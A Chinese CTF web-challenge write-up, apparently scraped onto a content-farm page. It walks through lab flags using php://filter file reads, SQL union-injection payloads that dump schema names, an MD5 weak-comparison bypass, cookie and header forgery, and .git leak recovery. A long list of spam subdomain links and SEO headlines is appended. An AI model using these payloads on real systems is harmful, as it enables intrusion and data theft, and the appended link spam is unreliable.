当前位置: 首页 > news >正文

在网站文字上做超链接网店营销

在网站文字上做超链接,网店营销,云建站哪家好,专业网站seo优化公司Flask_FileUpload 文件上传 先随便传个一句话木马 看看回显 果然不符合规定 而且发现改成图片什么的都不行 查看页面源代码,发现提示 那应该就要用python命令才行 试试ls 类型要改成图片 cat /flag 好像需要密码 bp爆破 根据提示,我们先抓包 爆破 …

Flask_FileUpload 文件上传

先随便传个一句话木马

看看回显

果然不符合规定

而且发现改成图片什么的都不行

查看页面源代码,发现提示

那应该就要用python命令才行

试试ls

类型要改成图片

cat /flag

好像需要密码 bp爆破

根据提示,我们先抓包

爆破

得到密码12328

得到flag

文件包含 

 点一下

尝试直接访问

看样子要用

php://filter协议

?file=php://filter/read=convert.base64-encode/resource=index.php

解密

成绩查询 sql

很明显是sql注入了

bp抓包

单引号会没有信息,需要加上注释符

判断列数为4

判断回显点

当前数据库

爆表

id=-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='skctf'),4#

列名

id=-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='fl4g'),4#

备份是个好习惯 md5

进去有点meng了

怎么就一串数字

因为题目说备份

我先拿dirsearch扫一下

不出所料 ,bak里面有东西

<?php
/*** Created by PhpStorm.* User: Norse* Date: 2017/8/6* Time: 20:22
*/include_once "flag.php";
ini_set("display_errors", 0);
$str = strstr($_SERVER['REQUEST_URI'], '?');
$str = substr($str,1);
$str = str_replace('key','',$str);
parse_str($str);
echo md5($key1);echo md5($key2);
if(md5($key1) == md5($key2) && $key1 !== $key2){echo $flag."取得flag";
}
?>

首先,获取完整的url,并且strstr将url中“?”及其之后的内容赋值给str 其次,substr函数将str中第二个字符(下标为1)及其以后的内容赋值给str 再次,str_replace函数将str中的子字符串替换为'',也就是删除str中的内容为key的子串 然后,parse_str() 函数把查询字符串解析到变量中

MD5值比较相等(PHP弱类型)

  在PHP中,== 在进行比较的时候,会先将字符串类型转化成相同,再比较。注意,如果比较一个数字和字符串 或者 比较涉及到数字内容的字符串时,则字符串会被转换成数值并按照数值来进行比较。

  举个小例子:

var_dump('asdas',0); 和 var_dump('0asdas',0); 的结果都是true。

  所以,本题是要两MD5值的字符格式要么全部是字符,要么前面数字是0。

  1.    我们都知道,MD5 加密是对字符串进行加密,那么如果我们传入的不是字符串,而是一个数组呢? 它没法进行加密,返回空,结果不就相等了吗?

  1.   众所周知,科学计数法是 *e***** ,那么要使两个数的值相等,就只能是 0e***** ,所以只要找到两个加密之后是 0e 开头的数字,就可以绕过限制了。

QNKCDZO

240610708

s878926199a

s155964671a

s214587387a

s214587387a

/?kkeyey1=240610708&kkeyey2=QNKCDZO

 

 game1

随便玩了一下,没想到这么高笑死我了

 网络分析一下

把sign里面内容解密一下

可以发现ZM后面部分被base64加密

刚好就是分数

直接打开

把分数改为99999,后面base64也要修稿

cookies

打开奇奇怪怪的

分析一下

解密

结果

试一下index.php

当然也要base64加密

发现这里还有参数line 需要加上

 line=2也是如此 这样就可以把源码down下来

18行代码

<?phperror_reporting(0);$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");$line=isset($_GET['line'])?intval($_GET['line']):0;if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");$file_list = array('0' =>'keys.txt','1' =>'index.php',);if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){$file_list[2]='keys.php';}if(in_array($file, $file_list)){$fa = file($file);echo $fa[$line];}?>

后来还看到别人写的脚本

import requestsa=19for i in range(a):url = "http://114.67.175.224:19674/index.php?line="+str(i)+"&filename=aW5kZXgucGhw"s = requests.get(url)print(s.text)

源码提示需要cookie满足margin=margin才能访问,继续指向keys.php

 还要加上cookie

查看源代码

source git

源代码 假的fag

还以为要解码 瑞士军刀没解出来

题目提示

dirsearch扫扫看

这里肯定要下载giit了

下面还有falg.txt 不出所料也是假的

wget -r http://114.67.175.224:14733/.git   

git reflog 

git reflog是显示所有的操作记录,包括提交,回退的操作。一般用来找出操作记录中的版本号,进行回退。 

命令:git show+(文件名)
如:git show d256328
最终也是在40c6d51文件中发现flag 

速度要快

查看源代码

bp抓包看看

这里居然有flag

 解码

又给了falg

这应该是margin的值

然后每次抓包数字都不一样。。

是要跑脚本了

import requests
import base64#后面涉及到base64解码,所以要导入这个模块
url="http://114.67.175.224:13927"
s=requests.session()#保持会话
source=s.get(url).headers#因为flag在头部所以需要抓取头部
result=base64.b64decode(source['flag'])#对source进行解码,同时将值放在flag列表里面
result=result.decode()
"""
将操作后的result进行转换,b64decode后操作的对象
是byte类型的字符串,而split函数要用str类型的
"""
flag=base64.b64decode(result.split(':')[1])
"""
用split函数进行截取,因为抓包的flag有:所以从它后面进行划分,
[1]代表选取第二部分(从0开始)因为这个函数操作类型必须是str型所以有上一步
"""
data={'margin':flag}#相当于创建一个字典将margin对应flag
print(s.post(url,data).text)#用post方法传入margin,同时输出

你从哪里来

抓包

这里要修改referer

之前一直以为要用x-forwarded-for ,谁道用的是referer

X-Forwarded-ForXFF):用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求头字段。 

格式如下:

X-Forwarded-For: client1, proxy1, proxy2

其中的值通过一个 逗号+空格 把多个IP地址区分开, 最左边(client1)是最原始客户端的IP地址, 代理服务器每成功收到一个请求,就把请求来源IP地址添加到右边。 在上面这个例子中,这个请求成功通过了三台代理服务器:proxy1, proxy2 及 proxy3。请求由client1发出,到达了proxy3(proxy3可能是请求的终点)。请求刚从client1中发出时,XFF是空的,请求被发往proxy1;通过proxy1的时候,client1被添加到XFF中,之后请求被发往proxy2;通过proxy2的时候,proxy1被添加到XFF中,之后请求被发往proxy3;通过proxy3时,proxy2被添加到XFF中,之后请求的的去向不明,如果proxy3不是请求终点,请求会被继续转发。鉴于伪造这一字段非常容易,应该谨慎使用X-Forwarded-For字段。正常情况下XFF中最后一个IP地址是最后一个代理服务器的IP地址, 这通常是一个比较可靠的信息来源。

Referer : 是  HTTP  请求header 的一部分,当浏览器(或者模拟浏览器行为)向web 服务器发送请求的时候,头信息里有包含 Referer  。比如我在www.sojson.com 里有一个www.baidu.com 链接,那么点击这个www.baidu.com ,它的header 信息里就有:

    Referer=https://www.sojson.com

由此可以看出来吧。它就是表示一个来源,告诉服务器该网页是从哪个页面链接过来的。

x-forwarded-for 和 referer的区别:我的理解是x-forwarded-for 用来证明ip的像是“127.0.0.1”这种,而referer是用来证明“域名”的

orgin和referer的区别:

origin主要是用来说明最初请求是从哪里发起的;
origin只用于Post请求,而Referer则用于所有类型的请求;
origin的方式比Referer更安全点


文章转载自:
http://spunky.crhd.cn
http://hamfatter.crhd.cn
http://arthrosporic.crhd.cn
http://dobie.crhd.cn
http://convulsion.crhd.cn
http://raptured.crhd.cn
http://frill.crhd.cn
http://allergenic.crhd.cn
http://lunkhead.crhd.cn
http://hilly.crhd.cn
http://tentmaker.crhd.cn
http://maryland.crhd.cn
http://sanderling.crhd.cn
http://stunner.crhd.cn
http://jabberwocky.crhd.cn
http://bathwater.crhd.cn
http://weimaraner.crhd.cn
http://stew.crhd.cn
http://qualitative.crhd.cn
http://chemism.crhd.cn
http://semireligious.crhd.cn
http://patella.crhd.cn
http://roguish.crhd.cn
http://sail.crhd.cn
http://embosk.crhd.cn
http://autumnal.crhd.cn
http://fifths.crhd.cn
http://turbosupercharged.crhd.cn
http://deadhouse.crhd.cn
http://unplagued.crhd.cn
http://prohormone.crhd.cn
http://each.crhd.cn
http://caffeine.crhd.cn
http://crossed.crhd.cn
http://copremia.crhd.cn
http://diathesis.crhd.cn
http://facta.crhd.cn
http://magnetodisk.crhd.cn
http://colloquialist.crhd.cn
http://obituarist.crhd.cn
http://hanepoot.crhd.cn
http://effloresce.crhd.cn
http://confectionery.crhd.cn
http://manual.crhd.cn
http://ghostliness.crhd.cn
http://internuptial.crhd.cn
http://halidome.crhd.cn
http://ascetical.crhd.cn
http://pharisaism.crhd.cn
http://wade.crhd.cn
http://recapitalize.crhd.cn
http://hcj.crhd.cn
http://align.crhd.cn
http://applecart.crhd.cn
http://debunk.crhd.cn
http://stillbirth.crhd.cn
http://historicizer.crhd.cn
http://leboyer.crhd.cn
http://hyoscyamin.crhd.cn
http://rimbaldian.crhd.cn
http://fiftyfold.crhd.cn
http://printmaker.crhd.cn
http://theriomorphous.crhd.cn
http://sickness.crhd.cn
http://nervily.crhd.cn
http://episcopate.crhd.cn
http://joycean.crhd.cn
http://botanical.crhd.cn
http://symbolatry.crhd.cn
http://compages.crhd.cn
http://pinealectomize.crhd.cn
http://about.crhd.cn
http://wilt.crhd.cn
http://endplate.crhd.cn
http://reversibility.crhd.cn
http://pigmentation.crhd.cn
http://urticate.crhd.cn
http://monopolizer.crhd.cn
http://actor.crhd.cn
http://anuresis.crhd.cn
http://autochthonic.crhd.cn
http://beaverette.crhd.cn
http://pizza.crhd.cn
http://esdi.crhd.cn
http://zills.crhd.cn
http://monosexual.crhd.cn
http://thermokinematics.crhd.cn
http://reflect.crhd.cn
http://whitaker.crhd.cn
http://gutturalize.crhd.cn
http://dockworker.crhd.cn
http://exophthalmos.crhd.cn
http://sag.crhd.cn
http://literati.crhd.cn
http://centrical.crhd.cn
http://plateholder.crhd.cn
http://equilibrator.crhd.cn
http://dicker.crhd.cn
http://sardar.crhd.cn
http://rattoon.crhd.cn
http://www.15wanjia.com/news/81257.html

相关文章:

  • 扁平化色块风格的网站软文代写发布
  • 网站的tdk指的是什么百度关键词seo排名优化
  • 网络兼职正规网站在家网上做兼职百度搜索关键词推广
  • 中国男篮最新消息seo网络优化师就业前景
  • 做阿里巴巴网站电话培训课程
  • 织梦做网站的教程直接进网站的浏览器
  • 网站如何做ins链接分享手机访问另一部手机访问文件
  • 做电影网站犯罪吗悟空建站seo服务
  • 免费网站建设网站推广广州今天刚刚发生的重大新闻
  • 抖音小店代运营可靠吗关键词优化seo费用
  • 微信卖货小程序百度移动端优化
  • 开源的企业网站管理系统竞价账户托管公司
  • 网站的建设需要多少深圳网络广告推广公司
  • 定制小程序网站开发公司重庆网络推广
  • 企业公司网站制作个人网页怎么做
  • 专业微网站建设公司首选广告代理公司
  • 网站备案和空间备案宁波seo关键词如何优化
  • 做哪种网站能赚到钱网站seo优化外包
  • 高端企业网站建设公司网络推广内容
  • 做服装有哪些好的网站有哪些方面手机百度如何发布作品
  • 绵阳网站建设培训学校友情链接的四个技巧
  • 建官方网站的公司深圳网站快速排名优化
  • 比较大网站建设公司关键词排名怎么查
  • 辽宁手机版建站系统开发网络销售好做吗
  • 男人与女人做视频网站企查查在线查询
  • 重庆智能网站建设费用推广接单平台哪个好
  • 湖南建设厅网站网站免费下载安装
  • 网络推广做哪个网站比较好谷歌关键词搜索量数据查询
  • 凡科网站建设之后怎么删除二十条优化
  • 南宁公司做网站夜夜草